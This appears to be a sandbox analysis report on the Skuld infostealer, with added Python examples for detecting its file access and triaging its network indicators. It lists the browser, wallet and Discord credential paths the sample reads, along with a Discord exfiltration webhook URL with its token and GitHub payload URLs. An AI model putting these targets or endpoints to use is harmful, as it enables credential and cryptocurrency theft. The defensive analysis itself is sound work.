                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\bookmarkbackupsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-releaseJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofoJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\webappsstore.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\webappsstore.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpnJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\crashes\eventsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\content-prefs.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkeckeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\sessionstore-backupsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.filesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eigblbgjknlfbajkfhopmcojidlgcehmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\archived\2023-10Jump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\saved-telemetry-pingsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Local\discordJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Local\discordcanaryJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Local\discordptbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Default\AppData\Local\discorddevelopmentJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Local\discordJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Local\discordcanaryJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Local\discordptbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\Public\AppData\Local\discorddevelopmentJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\discordJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\discordcanaryJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\discordptbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\discorddevelopmentJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
                        Source: Yara matchFile source: skuld.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: skuld.exe PID: 7148, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED
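The file-access list above is the evidence behind the report's "Tries to harvest and steal browser information", "Tries to steal Crypto Currency Wallets" and "Tries to steal communication platform credentials" signatures: one non-browser process reads Chrome/Edge "Login Data" and "Network\Cookies", a Firefox profile, Chrome extension storage, wallet files and the Discord data directories, and it does so not only under C:\Users\user but also under C:\Users\Default and C:\Users\Public, which no legitimate application has reason to do. The following is an added example, not Joe Sandbox code and not Skuld code, showing how a detection rule over such file-access telemetry can be written: it parses lines of the shape listed above (both the flattened form the extraction produced and a cleaned "Source: X | File opened: Y" form), groups paths into credential-store categories, ignores reads by the store's own application, and flags a process that touches several categories or another user's profile. The category patterns, the owner allowlist and the sample lines are this example's own constructions; the MetaMask extension ID is general knowledge, not taken from the report.

```python
"""Group sandbox file-access lines into infostealer credential-store categories.

Added example (not code from the report or from Skuld). Constructed inputs below.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Accepts "...skuld.exeFile opened: ...Jump to behavior" (flattened extraction)
# as well as "Source: X | File opened: Y" (cleaned form).
LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*"
    r"(?P<op>File opened|Directory queried):\s*"
    r"(?P<path>.+?)\s*(?:Jump to behavior)?\s*$",
    re.IGNORECASE,
)
PROFILE_RE = re.compile(r"^[a-z]:\\Users\\([^\\]+)\\", re.IGNORECASE)

# Path patterns per category; first matching category wins.
CATEGORIES: Dict[str, List[str]] = {
    "browser_logins": [r"\\Login Data$", r"\\Web Data$", r"\\Network\\Cookies$",
                       r"\\cookies\.sqlite", r"\\logins\.json$", r"\\key4\.db$"],
    "browser_history": [r"\\History$", r"\\places\.sqlite", r"\\favicons\.sqlite"],
    "browser_extension_storage": [r"\\Local Extension Settings\\[a-p]{32}$"],
    "wallet_files": [r"\\Exodus\\exodus\.wallet$", r"\\Electrum\\wallets$",
                     r"\\Coinomi\\Coinomi\\wallets$", r"\\atomic\\Local Storage\\leveldb$",
                     r"\\Guarda\\Local Storage\\leveldb$", r"\\com\.liberty\.jaxx\\IndexedDB\\"],
    "messaging_tokens": [r"\\AppData\\Local\\discord(canary|ptb|development)?$"],
}

# Image names allowed to read each store. Assumed allowlist for this example;
# a production rule would key on the signed image path, not the basename.
LEGIT_OWNERS: Dict[str, set] = {
    "browser_logins": {"chrome.exe", "msedge.exe", "firefox.exe"},
    "browser_history": {"chrome.exe", "msedge.exe", "firefox.exe"},
    "browser_extension_storage": {"chrome.exe", "msedge.exe"},
    "wallet_files": {"exodus.exe", "electrum.exe", "coinomi.exe"},
    "messaging_tokens": {"discord.exe"},
}

# Well-known Chrome Web Store ID (general knowledge, not from the report).
KNOWN_EXTENSIONS = {"nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask"}


def parse_line(line: str) -> Optional[dict]:
    """Return {proc, op, path} for a behaviour line, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"proc": m["proc"].strip(), "op": m["op"], "path": m["path"].strip()}


def classify(path: str) -> Optional[str]:
    """Map a path to a credential-store category, or None."""
    for cat, patterns in CATEGORIES.items():
        if any(re.search(p, path, re.IGNORECASE) for p in patterns):
            return cat
    return None


def profile_of(path: str) -> Optional[str]:
    """User profile name a path lives under, e.g. 'Default' for C:\\Users\\Default\\..."""
    m = PROFILE_RE.match(path)
    return m.group(1) if m else None


def analyse(lines: List[str]) -> dict:
    """Count credential-store reads by processes that do not own the store."""
    hits: Dict[str, int] = defaultdict(int)
    profiles, extensions = set(), set()
    running_user = None
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        image = ev["proc"].rsplit("\\", 1)[-1].lower()
        if running_user is None:
            running_user = profile_of(ev["proc"])  # profile the process itself runs from
        cat = classify(ev["path"])
        if cat is None or image in LEGIT_OWNERS.get(cat, set()):
            continue  # not a credential store, or the application reading its own data
        hits[cat] += 1
        owner = profile_of(ev["path"])
        if owner:
            profiles.add(owner)
        if cat == "browser_extension_storage":
            ext_id = ev["path"].rsplit("\\", 1)[-1].lower()
            if ext_id in KNOWN_EXTENSIONS:
                extensions.add(KNOWN_EXTENSIONS[ext_id])
    foreign = sorted(p for p in profiles if p != running_user)
    return {
        "by_category": dict(hits),
        "profiles_touched": sorted(profiles),
        "foreign_profiles": foreign,          # other users' profiles read: a stealer tell
        "known_extensions": sorted(extensions),
        "verdict": len(hits) >= 2 or bool(foreign),
    }


# Constructed sample, taken from the entries this report lists plus one benign line.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior",
    r"Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior",
    r"Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet",
    r"Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\Default\AppData\Roaming\Electrum\wallets",
    r"Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\Public\AppData\Roaming\Coinomi\Coinomi\wallets",
    r"Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\discordcanary",
    r"Source: C:\Users\user\Desktop\skuld.exe | Directory queried: C:\Users\Public\Documents",
    # Benign (constructed): the browser reading its own history is not an alert.
    r"Source: C:\Program Files\Mozilla Firefox\firefox.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\places.sqlite",
]

if __name__ == "__main__":
    print(analyse(SAMPLE_LINES))
```

The rule deliberately keys on the reading process rather than on the files alone: browsers, wallets and Discord open these paths constantly, so the signal is a foreign image reading several stores, and, stronger still, reading them under profiles the process does not run as.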

                        Remote Access Functionality

Source: Yara match | File source: skuld.exe, type: SAMPLE
Source: Yara match | File source: 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: skuld.exe PID: 7148, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED
MITRE ATT&CK Matrix (one line per tactic; a technique preceded by digits carries the report's count badges for that technique, the remaining entries are the matrix's unmarked cells):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: 21 Windows Management Instrumentation, 122 Command and Scripting Interpreter, 2 PowerShell, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading, 1 Windows Service, 1 Registry Run Keys / Startup Folder, Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: 1 DLL Side-Loading, 1 Windows Service, 12 Process Injection, 1 Registry Run Keys / Startup Folder, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Defense Evasion: 1 File and Directory Permissions Modification, 3 Disable or Modify Tools, 1 Deobfuscate/Decode Files or Information, 1 Install Root Certificate, 1 DLL Side-Loading, 1 Masquerading, 1 Modify Registry, 151 Virtualization/Sandbox Evasion, 12 Process Injection
Credential Access: 1 OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: 1 File and Directory Discovery, 24 System Information Discovery, 131 Security Software Discovery, 2 Process Discovery, 151 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 Remote System Discovery, 1 System Network Configuration Discovery, Network Sniffing
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: 31 Data from Local System, 1 Email Collection, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: 3 Ingress Tool Transfer, 1 Encrypted Channel, 4 Non-Application Layer Protocol, 5 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
Behavior Graph (ID: 1636046, Sample: skuld.exe, Start date: 12/03/2025, Architecture: WINDOWS, Score: 100)

Start (node 2)
  DNS/IP: ip-api.com; discord.com; 2 other IPs or domains
  Signatures: Sigma detected: Capture Wi-Fi password; Multi AV Scanner detection for submitted file; Yara detected Skuld Stealer; 9 other signatures
  Process started: skuld.exe (node 9; 2 created registry values, 70 created files)

skuld.exe (node 9)
  DNS/IP: ip-api.com 208.95.112.1, source port 49705, destination port 80, TUT-ASUS, United States; api.gofile.io 51.91.7.6, destination port 443, source port 49706, OVHFR, France; 3 other IPs or domains
  Files dropped: C:\Users\user\...\SecurityHealthSystray.exe (PE32+); C:\Windows\System32\drivers\etc\hosts (ASCII)
  Signatures: Installs new ROOT certificates; Found many strings related to Crypto-Wallets (likely being stolen); Uses cmd line tools excessively to alter registry or file data; 11 other signatures
  Processes started: powershell.exe (node 14; badge 9); powershell.exe (node 17); powershell.exe (node 19); 12 other processes

powershell.exe (node 14)
  Signature: Loading BitLocker PowerShell Module

powershell.exe (node 19)
  File dropped: C:\Users\user\AppData\...\dh1o0wbe.cmdline (Unicode)
  Process started: csc.exe (node 24)

csc.exe (node 24)
  File dropped: C:\Users\user\AppData\Local\...\dh1o0wbe.dll (PE32)
  Process started: cvtres.exe (node 27)

Source | Detection | Scanner | Label
skuld.exe | 25% | Virustotal |

No Antivirus matches (three further scan tables, each empty)

Source | Detection | Scanner | Label
http://crl.micft.cMicRosof | 0% | Avira URL Cloud | safe
http://crl.mic | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.pngP | 0% | Avira URL Cloud | safe
https://oneget.orgXX | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.136.232 | true | false | | high
api.ipify.org | 104.26.13.205 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
api.gofile.io | 51.91.7.6 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/json | false | | high
https://api.gofile.io/getServer | false | | high
https://api.ipify.org/ | false | | high
https://discord.com/api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbw | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
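The contacted URLs above divide into three roles the report's signatures already name: ip-api.com with fields=hosting is the "Check if machine is in data center or colocation facility" probe (and, with api.ipify.org and ip-api.com/json, plain IP geolocation), the gofile.io getServer/uploadFile pair is a file-upload channel, and the Discord webhook is where results are posted. Note that every domain scores a "high" reputation: they are all legitimate services, so reputation feeds will not catch this traffic and the IOC has to be the specific webhook path. The following is an added example, not part of the Joe Sandbox report or of Skuld, showing a triage step over such strings: it splits URLs that the Go binary's string table ran together (Go stores string constants back to back without terminators, which is why the strings section below shows forms like ".../getServerhttps://%s.gofile.io/uploadFile"), assigns each URL a role, decodes the creation time embedded in the Discord webhook ID (a Discord snowflake carries milliseconds since 2015-01-01 UTC in its upper bits) and defangs the indicators for sharing. The role regexes and the sample list are this example's own constructions; the sample URLs are copied from the tables on this page.

```python
"""Triage the network indicators extracted from a stealer sample.

Added example (not code from the report or from Skuld). Constructed inputs below.
"""
import re
from datetime import datetime, timezone
from typing import Dict, List, Optional

DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00Z, start of Discord's snowflake clock

# One URL runs until the next "http(s)://" or the end of the blob.
URL_RE = re.compile(r"https?://.+?(?=https?://|$)", re.IGNORECASE)

# Role assignment in priority order; the roles follow what this report's
# signatures say the endpoints are used for, the regexes are this example's own.
ROLES = [
    ("hosting_check", re.compile(r"^https?://ip-api\.com/line/\?fields=hosting", re.I)),
    ("ip_geolocation", re.compile(r"^https?://(ip-api\.com/json|api\.ipify\.org/?)$", re.I)),
    ("discord_webhook", re.compile(r"^https://discord\.com/api/webhooks/(\d{17,20})/", re.I)),
    ("discord_api", re.compile(r"^https://discord\.com/api/v\d+/", re.I)),
    ("gofile_upload", re.compile(r"^https://[a-z0-9%]+\.gofile\.io/(getServer|uploadFile)", re.I)),
    ("payload_download", re.compile(r"^https://github\.com/[^/]+/[^/]+/raw/.+\.asar", re.I)),
]


def split_fused(blob: str) -> List[str]:
    """Split a run of concatenated URLs into individual URLs."""
    return URL_RE.findall(blob)


def classify_url(url: str) -> Optional[str]:
    """First role whose pattern matches, or None for unclassified URLs."""
    for role, pattern in ROLES:
        if pattern.match(url):
            return role
    return None


def snowflake_time(snowflake: int) -> datetime:
    """Creation time encoded in a Discord snowflake (upper 42 bits, ms since epoch)."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def webhook_created_at(url: str) -> Optional[datetime]:
    """Creation time of the webhook named in a discord.com/api/webhooks URL."""
    m = re.search(r"/api/webhooks/(\d+)/", url)
    return snowflake_time(int(m.group(1))) if m else None


def defang(url: str) -> str:
    """hxxp://host[.]tld/... so the IOC cannot be clicked by accident."""
    m = re.match(r"^(https?)://([^/]+)(.*)$", url, re.I)
    if not m:
        return url
    scheme, host, rest = m.groups()
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + rest


def triage(strings: List[str]) -> dict:
    """Group URLs by role, decode webhook IDs, and keep the leftovers for review."""
    roles: Dict[str, List[str]] = {}
    webhooks, unclassified = [], []
    for blob in strings:
        for url in split_fused(blob):
            role = classify_url(url)
            if role is None:
                unclassified.append(url)
                continue
            roles.setdefault(role, []).append(defang(url))
            if role == "discord_webhook":
                wid = int(re.search(r"/webhooks/(\d+)/", url).group(1))
                webhooks.append({"id": wid, "created_utc": snowflake_time(wid).isoformat()})
    return {"roles": roles, "webhooks": webhooks, "unclassified": unclassified}


# Constructed sample: strings copied from the URL tables of this report.
SAMPLE_STRINGS = [
    "http://ip-api.com/line/?fields=hosting",
    "http://ip-api.com/json",
    "https://api.ipify.org/",
    "https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:",
    "https://discord.com/api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbw",
    "https://discord.com/api/v9/users/",
    "https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet",
    "https://www.amazon.com/",
]

if __name__ == "__main__":
    print(triage(SAMPLE_STRINGS))
```

Decoding the webhook ID gives 2025-03-09, three days before this analysis ran, which is the kind of freshness check worth recording alongside the indicator: a webhook minted days before the sample appeared is attacker infrastructure built for this campaign, not a long-lived shared endpoint.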
Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/Pester/PesterP | powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com/api/v8/guilds/too | skuld.exe, SecurityHealthSystray.exe.0.dr | false | | high
https://contoso.com/License | powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&se | skuld.exe, 00000000.00000002.2728804738.000000C00011A000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://go.dev/issue/66821): | skuld.exe, SecurityHealthSystray.exe.0.dr | false | | high
https://weibo.com/ | skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://media.discordapp.net/attachments/1348329531148079104/1349316345950503014/Display_1.png?ex=67 | skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.zhihu.com/ | skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://discord.gg/release | skuld.exe, SecurityHealthSystray.exe.0.dr | false | | high
https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON | skuld.exe, SecurityHealthSystray.exe.0.dr | false | | high
https://www.msn.com | skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 0000000D.00000002.1724018024.000001CAEF230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1724018024.000001CAEF371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1594297796.000001CAE0B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com/api/v9/users/ | SecurityHealthSystray.exe.0.dr | false | | high
http://crl.micft.cMicRosof | powershell.exe, 0000000F.00000002.1773965348.000002704FFF6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000D.00000002.1594297796.000001CADF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.0000027037791000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpg | skuld.exe, 00000000.00000002.2728804738.000000C000054000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.ebay.co.uk/ | skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 0000000D.00000002.1724018024.000001CAEF230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1724018024.000001CAEF371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1594297796.000001CAE0B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet | skuld.exe, SecurityHealthSystray.exe.0.dr | false | | high
